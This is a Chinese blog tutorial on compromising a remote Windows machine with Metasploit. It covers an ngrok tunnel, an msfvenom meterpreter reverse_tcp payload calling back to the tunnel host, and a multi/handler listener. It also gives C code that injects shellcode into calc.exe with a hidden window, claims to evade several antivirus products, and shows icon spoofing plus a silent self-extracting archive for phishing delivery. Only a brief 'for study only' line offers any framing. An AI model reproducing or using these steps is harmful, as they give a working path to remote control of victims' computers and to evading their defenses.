MSF外网渗透+shellcode免杀

最新推荐文章于 2024-06-04 18:38:16 发布
最新推荐文章于 2024-06-04 18:38:16 发布
阅读量4.5k 收藏 129
点赞数 13
文章标签: kali linux 渗透测试 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/115865315
版权

1. 内网穿透

使用的Sunny-Ngrok服务 。你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定。
官网链接:https://www.ngrok.cc/(Sunny-Ngrok服务 )
在这里插入图片描述
在kali下安装Sunny-Ngrok的客户端,在该目录下启动Sunny-Ngrok。
在这里插入图片描述
在这里插入图片描述

2. 外网渗透

生成外网木马。注意这里的lhost和lport为赠送的域名和远程端口号:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxxxx.xxxx.com lport=10011 -f exe > test.exe

这里使用nat模式实现虚拟机内外网隔离:
在这里插入图片描述
在这里插入图片描述
设置监听。

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.157
msf5 exploit(multi/handler) > set lport 12581
msf5 exploit(multi/handler) > run

在这里插入图片描述
等待受害者主机上线
在这里插入图片描述
外网渗透成功

3. shellcode免杀

主要有”分离“、”混淆“、”注入“和加载器执行等方式免杀。
参考文章:https://xz.aliyun.com/t/7170#toc-4(shellcode免杀总结)
这里使用的是注入方式免杀:
使用msfvenom生成外网木马的c版本shellcode:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 \b '\x00' lhost=xxxx.xxxx.com lport=10011 -f c

然后使用c语言起一个正常进程注入shellcode:

// 1018.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include <tchar.h>
#include "iostream"
using namespace std;
    unsigned char shellcode[] =
    #(这里放shellcode)
     
BOOL injection()
{
    TCHAR Cappname[MAX_PATH] = { 0 };
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID lpMalwareBaseAddr;
    LPVOID lpnewVictimBaseAddr;
    HANDLE hThread;
    DWORD dwExitCode;
    BOOL bRet = FALSE;

    lpMalwareBaseAddr = shellcode;

    GetSystemDirectory(Cappname, MAX_PATH);
    _tcscat(Cappname, "\\calc.exe");
    printf("Injection program Name:%S\r\n", Cappname);

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    if (CreateProcess(Cappname, NULL, NULL, NULL,
        FALSE, CREATE_SUSPENDED
        , NULL, NULL, &si, &pi) == 0)
    {
        return bRet;
    }

    lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
        , NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (lpnewVictimBaseAddr == NULL)
    {
        return bRet;
    }

    WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,
        (LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);

    hThread = CreateRemoteThread(pi.hProcess, 0, 0,
        (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);

    WaitForSingleObject(pi.hThread, INFINITE);
    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    TerminateProcess(pi.hProcess, 0);
    return bRet;
}

void help(char* proc)
{
    printf("%s:[-] \nstart a process and injection shellcode to memory\r\n", proc);
}

int main(int argc, char* argv[])
{
	HWND hwndDOS = GetForegroundWindow(); //得到前台窗口的句柄
	ShowWindow(hwndDOS, SW_HIDE); //隐藏窗口
    help(argv[0]);
    injection();
	return 0;
}

编译组建生成exe,验证360免杀:
在这里插入图片描述
QQ安全管家免杀:
在这里插入图片描述
火绒免杀:
在这里插入图片描述
但是无法绕过win10微软防火墙。

4. 修改图标

在线.png转换.ico:https://www.img2go.com/zh/convert/png-to-ico
使用Resource Hacker软件修改exe图标,官网下载地址:http://www.angusj.com/resourcehacker/
将exe程序拖进来,添加图标选择.ico文件最后保存即可
在这里插入图片描述
最后得到的新文件
在这里插入图片描述

5. 自解压钓鱼

创建自解压文件
在这里插入图片描述
点击高级,自解压选项,常规,设置自解压路径
在这里插入图片描述
点击设置,设置解压后运行文件路径
在这里插入图片描述
模式选择全部隐藏
在这里插入图片描述
更新设置成覆盖所有文件,保证二次自解压不报错,不会引起怀疑

在这里插入图片描述
修改自解压文件图标
在这里插入图片描述
至此exe伪装就完成了

最后,本文章仅供学习,请遵守法律
参考链接:
https://www.fujieace.com/kali-linux/msf-extranet-intranet.html(msf外网渗透)
https://xz.aliyun.com/t/7170#toc-4(shellcode免杀总结)
https://mp.weixin.qq.com/s/lKmGwk1uXFw83UuNpntf_w(网络钓鱼)

yAnd0n9
关注
  • 13
    点赞
  • 129
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
渗透学习-靶场篇-XSS之订单与shell箱子反杀
qq_43696276的博客
09-19 2450
这里,我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外,我们还将进行shell箱子的反杀过程!!
XXXXXXXXXXXXXXXXXXXXX
热门推荐
小菜鸟的博客
12-31 56万+
public class FTPUtil {  public static Log logger = LogFactory.getLog(FTPUtil.class);  private static String userName; // FTP ��¼�û���  private static String password; // FTP ��¼����  private stati
Kali初讲——非局域网下入侵手机
最新发布
萌蠢骇客
06-04 1414
kali linux使用反弹shell入侵手机全流程——使用本教程请遵循网络安全法。
XXXXX
skylovelovewhz的专栏
01-13 14万+
package com.chinacreator.accesscontrol.utils;import java.math.BigDecimal;import com.chinacreator.dao2.DAO;/** * ID自动生成器 * * @author li.zhu * @version 1.0 */public class IdGenerator { /**  * 私有
A. XXXXX
无知的我
06-21 16万+
time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output Ehab loves number theory, but for some reason he hates the numberxx. Given an arrayaa, find the length of its longest subarray such that ..
The server time zone value 'XXXXXXXXX' is unrecognized or represents more tha
NUEST_LOVE的博客
12-18 4万+
报错信息: Caused by: java.sql.SQLException: The server time zone value 'XXXXXXXXX' is unrecognized or represents more than one time zone. 原因:在使用mysql的jdbc驱动最新版(6.0+)时,网友说是遇到数据库和系统时区差异引起的问题,总之问题出在最新版的驱动的...
xxxxxxxxxxxx
u011008486的专栏
11-27 18万+
[img]http://dl2.iteye.com/upload/attachment/0113/3701/bd1cf165-637f-3aba-9a27-1eeb7ae7517c.jpg[/img] [img]http://dl2.iteye.com/upload/attachment/0113/3760/df06ca6c-1f03-31c6-bc24-5b44105aa86b.p...
浅谈MSF渗透测试
02-24
此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
ShellCodeLoader:用于MSF和钴击的ShellCode Loader
05-24
用于MSF和钴击的ShellCode Loader msfvenom -p windows/exec CMD=calc.exe -fc 的shellcode:bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729...
msf 渗透测试
06-05
msf渗透
MSF实现远程渗透
WFC1006848997的博客
01-12 2503
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
u014483623的专栏
04-02 2万+
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
msf手机渗透二(实现外网渗透
weixin_63204687的博客
11-07 3121
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
Verifying 000xxxxx ( 0%) Verify failed between address 0xxxxxx and 0xxxxxx Leaving target processor
Studying……
09-24 3万+
1. 首先要根据address后面的两个地址判断出错的到底是什么器件。一般情况出现错误的大多是存储器。     判断的方法是根据sopc中的地址,或者是system.h中的地址,查找相应出错的器件。 2. 检查硬件焊接是否正常。     很多时候有些问题是硬件焊接造成的,这个主要针对的是自己焊接的板子,一旦地址数据总线有任何焊接问题,都会出现verify failed错误。 3.
Invalid bound statement(not found):xxxx.xxxx.xxxxx.xxxx
仲夏先森的博客
06-12 12万+
使用Mybatis的xml开发Controller不能找到Service方法错误 一开始图省事,想写一个测试代码报错很明显,说controller找不到service的方法,其实跟他们没有关系。 改正一下结构 ...
cxxxxx和xxxxx.h的区别
Saiyyc的博客
03-14 10万+
在C语言中,xxxxx.h 头文件是主要的,例如stdio.h,string.h,math.h。而在后来的C++语言中,C++是C的超集,且C++中,已不推荐再用C的类库,但为了对已有代码的保护,还是对原来的头文件支持。   cxxxx是c++从C的xxxxx.h继承来的,在前面加C同时不要h后缀,在C++环境当然是选用前者,两者内容都一样,只是cxxxx头文件中定义的名字被定义在命名空间std
超实用!手把手教你如何用MSF进行后渗透测试
xv66666的博客
07-20 1096
Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。Meterpreter 是msf的一个payload,目标执行之后,我们会得到一个会话,和常见的shell会话类似,但是它的功能更加强大,它是执行后渗透测试的实施通道。msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
msf生成shellcode
06-28
MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同类型的shellcode以及使用MSF生成工具等。通过合理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值